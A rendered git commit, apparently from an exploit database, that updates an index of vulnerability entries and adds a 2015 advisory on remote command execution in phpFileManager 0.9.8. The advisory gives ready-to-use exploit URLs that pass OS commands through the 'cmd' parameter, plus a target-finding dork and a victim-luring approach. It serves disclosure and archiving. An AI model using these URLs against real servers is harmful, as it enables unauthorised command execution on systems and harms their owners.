DB: 2015-07-29
1 new exploits
This commit is contained in:
Offensive Security
parent
05f61b57bd
commit
7c8d57574c
4 changed files with 201 additions and 85 deletions
|
|
@ -5935,7 +5935,7 @@ id,file,description,date,author,platform,type,port
|
|||
6349,platforms/php/webapps/6349.txt,"Reciprocal Links Manager 1.1 (site) SQL Injection Vulnerability",2008-09-02,"Hussin X",php,webapps,0
|
||||
6350,platforms/php/webapps/6350.txt,"AJ HYIP ACME (comment.php artid) SQL Injection Vulnerability",2008-09-02,"security fears team",php,webapps,0
|
||||
6351,platforms/php/webapps/6351.txt,"AJ HYIP ACME (readarticle.php artid) SQL Injection Vulnerability",2008-09-02,InjEctOr5,php,webapps,0
|
||||
6352,platforms/php/webapps/6352.txt,"CS-Cart <= 1.3.5 (Auth Bypass) SQL Injection Vulnerability",2008-09-02,"GulfTech Security",php,webapps,0
|
||||
6352,platforms/php/webapps/6352.txt,"CS-Cart <= 1.3.5 - (Auth Bypass) SQL Injection Vulnerability",2008-09-02,"GulfTech Security",php,webapps,0
|
||||
6353,platforms/windows/dos/6353.txt,"Google Chrome Browser 0.2.149.27 - DoS Vulnerability",2008-09-03,"Rishi Narang",windows,dos,0
|
||||
6354,platforms/php/webapps/6354.txt,"Spice Classifieds (cat_path) Remote SQL Injection Vulnerability",2008-09-03,InjEctOr5,php,webapps,0
|
||||
6355,platforms/windows/remote/6355.txt,"Google Chrome Browser 0.2.149.27 Automatic File Download Exploit",2008-09-03,nerex,windows,remote,0
|
||||
|
|
@ -7700,7 +7700,7 @@ id,file,description,date,author,platform,type,port
|
|||
8181,platforms/php/webapps/8181.c,"PHP Director <= 0.21 (sql into outfile) eval() Injection Exploit",2009-03-09,StAkeR,php,webapps,0
|
||||
8182,platforms/php/webapps/8182.txt,"PHPRecipeBook 2.24 (base_id) Remote SQL Injection Vulnerability",2009-03-09,d3b4g,php,webapps,0
|
||||
8183,platforms/php/webapps/8183.txt,"woltlab burning board 3.0.x - Multiple Vulnerabilities",2009-03-09,StAkeR,php,webapps,0
|
||||
8184,platforms/php/webapps/8184.txt,"CS-Cart 2.0.0 Beta 3 (product_id) SQL Injection Vulnerability",2009-03-09,netsoul,php,webapps,0
|
||||
8184,platforms/php/webapps/8184.txt,"CS-Cart 2.0.0 Beta 3 - (product_id) SQL Injection Vulnerability",2009-03-09,netsoul,php,webapps,0
|
||||
8185,platforms/php/webapps/8185.txt,"phpCommunity 2.1.8 (SQL/DT/XSS) Multiple Vulnerabilities",2009-03-09,"Salvatore Fresta",php,webapps,0
|
||||
8186,platforms/php/webapps/8186.txt,"PHP-Fusion Mod Book Panel (bookid) SQL Injection Vulnerability",2009-03-09,elusiven,php,webapps,0
|
||||
8187,platforms/hardware/dos/8187.sh,"Addonics NAS Adapter Post-Auth Denial of Service Exploit",2009-03-09,h00die,hardware,dos,0
|
||||
|
|
@ -24156,7 +24156,7 @@ id,file,description,date,author,platform,type,port
|
|||
27027,platforms/php/webapps/27027.txt,"Jax Calendar 1.34 Jax_calendar.PHP SQL Injection Vulnerability",2005-12-26,r0t3d3Vil,php,webapps,0
|
||||
27028,platforms/php/webapps/27028.txt,"LogicBill 1.0 - Multiple SQL Injection Vulnerabilities",2005-12-25,r0t3d3Vil,php,webapps,0
|
||||
27029,platforms/php/webapps/27029.txt,"EZ Invoice Inc. EZI 2.0 Invoices.PHP SQL Injection Vulnerability",2005-12-25,r0t3d3Vil,php,webapps,0
|
||||
27030,platforms/php/webapps/27030.txt,"CS-Cart Multiple SQL Injection Vulnerabilities",2005-12-25,r0t3d3Vil,php,webapps,0
|
||||
27030,platforms/php/webapps/27030.txt,"CS-Cart - Multiple SQL Injection Vulnerabilities",2005-12-25,r0t3d3Vil,php,webapps,0
|
||||
27031,platforms/linux/dos/27031.c,"Linux Kernel 2.6.x - SET_MEMPOLICY Local Denial of Service Vulnerability",2006-01-04,"Doug Chapman",linux,dos,0
|
||||
27032,platforms/linux/remote/27032.txt,"Hylafax 4.1/4.2 - Multiple Scripts Remote Command Execution Vulnerability",2006-01-05,"Patrice Fournier",linux,remote,0
|
||||
27033,platforms/php/webapps/27033.txt,"Foro Domus 2.10 - Multiple Input Validation Vulnerabilities",2006-01-06,"Aliaksandr Hartsuyeu",php,webapps,0
|
||||
|
|
@ -32534,7 +32534,7 @@ id,file,description,date,author,platform,type,port
|
|||
36090,platforms/php/webapps/36090.txt,"ClickCMS Denial of Service Vulnerability and CAPTCHA Bypass Vulnerability",2011-08-29,MustLive,php,webapps,0
|
||||
36091,platforms/php/webapps/36091.txt,"IBM Open Admin Tool 2.71 Multiple Cross Site Scripting Vulnerabilities",2011-08-30,"Sumit Kumar Soni",php,webapps,0
|
||||
36092,platforms/windows/dos/36092.pl,"MapServer <= 6.0 Map File Double Free Remote Denial of Service Vulnerability",2011-08-30,rouault,windows,dos,0
|
||||
36093,platforms/php/webapps/36093.txt,"CS-Cart 2.2.1 'products.php' SQL Injection Vulnerability",2011-08-30,Net.Edit0r,php,webapps,0
|
||||
36093,platforms/php/webapps/36093.txt,"CS-Cart 2.2.1 - 'products.php' SQL Injection Vulnerability",2011-08-30,Net.Edit0r,php,webapps,0
|
||||
36094,platforms/php/webapps/36094.txt,"TinyWebGallery 1.8.4 Local File Include and SQL Injection Vulnerabilities",2011-08-31,KedAns-Dz,php,webapps,0
|
||||
36095,platforms/php/webapps/36095.txt,"Serendipity 1.5.1 'research_display.php' SQL Injection Vulnerability",2011-08-31,The_Exploited,php,webapps,0
|
||||
36096,platforms/php/webapps/36096.txt,"Web Professional 'default.php' SQL Injection Vulnerability",2011-08-31,The_Exploited,php,webapps,0
|
||||
|
|
@ -34036,3 +34036,4 @@ id,file,description,date,author,platform,type,port
|
|||
37705,platforms/php/webapps/37705.txt,"WordPress Unite Gallery Lite Plugin 1.4.6 - Multiple Vulnerabilities",2015-07-27,"Nitin Venkatesh",php,webapps,80
|
||||
37707,platforms/php/webapps/37707.txt,"WordPress Count Per Day Plugin 3.4 - SQL Injection",2015-07-27,"High-Tech Bridge SA",php,webapps,80
|
||||
37708,platforms/php/webapps/37708.txt,"Xceedium Xsuite - Multiple Vulnerabilities",2015-07-27,modzero,php,webapps,0
|
||||
37709,platforms/php/webapps/37709.txt,"phpFileManager 0.9.8 - Remote Command Execution Vulnerability",2015-07-28,"John Page",php,webapps,0
|
||||
|
|
|
|||
|
Can't render this file because it is too large.
|
115
platforms/php/webapps/37709.txt
Executable file
115
platforms/php/webapps/37709.txt
Executable file
|
|
@ -0,0 +1,115 @@
|
|||
# Exploit Title: Remote Command Execution
|
||||
# Google Dork: intitle: PHP Remote Command Execution
|
||||
# Date: 2015-07-28
|
||||
# Exploit Author: John Page ( hyp3rlinx )
|
||||
# Website: hyp3rlinx.altervista.org
|
||||
# Vendor Homepage: phpfm.sourceforge.net
|
||||
# Software Link: phpfm.sourceforge.net
|
||||
# Version: 0.9.8
|
||||
# Tested on: windows 7 SP1
|
||||
# Category: Webapps
|
||||
|
||||
|
||||
|
||||
Vendor:
|
||||
================================
|
||||
phpfm.sourceforge.net
|
||||
|
||||
|
||||
|
||||
Product:
|
||||
================================
|
||||
phpFileManager version 0.9.8
|
||||
|
||||
|
||||
Vulnerability Type:
|
||||
========================
|
||||
Remote Command Execution
|
||||
|
||||
|
||||
CVE Reference:
|
||||
==============
|
||||
N/A
|
||||
|
||||
|
||||
|
||||
Advisory Information:
|
||||
=======================================================
|
||||
Remote Command Execution Vulnerability
|
||||
|
||||
|
||||
|
||||
|
||||
Vulnerability Details:
|
||||
=====================
|
||||
PHPFileManager is vulnerable to remote command execution
|
||||
and will call operating system commands via GET requests
|
||||
from a victims browser. By getting the victim to click our malicious link
|
||||
or visit our malicious website.
|
||||
|
||||
|
||||
|
||||
|
||||
Exploit code(s):
|
||||
===============
|
||||
|
||||
|
||||
Remote Command Execution:
|
||||
-------------------------
|
||||
|
||||
1- call Windows cmd.exe
|
||||
|
||||
https://localhost/phpFileManager-0.9.8/index.php?action=6¤t_dir=C:/xampp/htdocs/phpFileManager-0.9.8/&cmd=c%3A\Windows\system32\cmd.exe
|
||||
<https://localhost/phpFileManager-0.9.8/index.php?action=6¤t_dir=C:/xampp/htdocs/phpFileManager-0.9.8/&cmd=c%3A%5CWindows%5Csystem32%5Ccmd.exe>
|
||||
|
||||
2- Run Windows calc.exe
|
||||
|
||||
https://localhost/phpFileManager-0.9.8/index.php?action=6¤t_dir=C:/xampp/htdocs/phpFileManager-0.9.8/&cmd=c%3A\Windows\system32\calc.exe
|
||||
<https://localhost/phpFileManager-0.9.8/index.php?action=6¤t_dir=C:/xampp/htdocs/phpFileManager-0.9.8/&cmd=c%3A%5CWindows%5Csystem32%5Ccalc.exe>
|
||||
|
||||
|
||||
|
||||
Disclosure Timeline:
|
||||
=========================================================
|
||||
|
||||
Vendor Notification: NA
|
||||
July 28, 2015 : Public Disclosure
|
||||
|
||||
|
||||
|
||||
Severity Level:
|
||||
=========================================================
|
||||
High
|
||||
|
||||
|
||||
|
||||
Description:
|
||||
==========================================================
|
||||
|
||||
|
||||
Request Method(s): [+] GET
|
||||
|
||||
|
||||
Vulnerable Product: [+] phpFileManager 0.9.8
|
||||
|
||||
|
||||
Vulnerable Parameter(s): [+] 'cmd'= [OS command]
|
||||
|
||||
|
||||
Affected Area(s): [+] Operating System
|
||||
|
||||
|
||||
===========================================================
|
||||
|
||||
[+] Disclaimer
|
||||
Permission is hereby granted for the redistribution of this advisory,
|
||||
provided that it is not altered except by reformatting it, and that due
|
||||
credit is given. Permission is explicitly given for insertion in
|
||||
vulnerability databases and similar, provided that due credit is given to
|
||||
the author.
|
||||
The author is not responsible for any misuse of the information contained
|
||||
herein and prohibits any malicious use of all security related information
|
||||
or exploits by the author or elsewhere.
|
||||
|
||||
|
||||
by hyp3rlinx
|
||||
Loading…
Add table
Reference in a new issue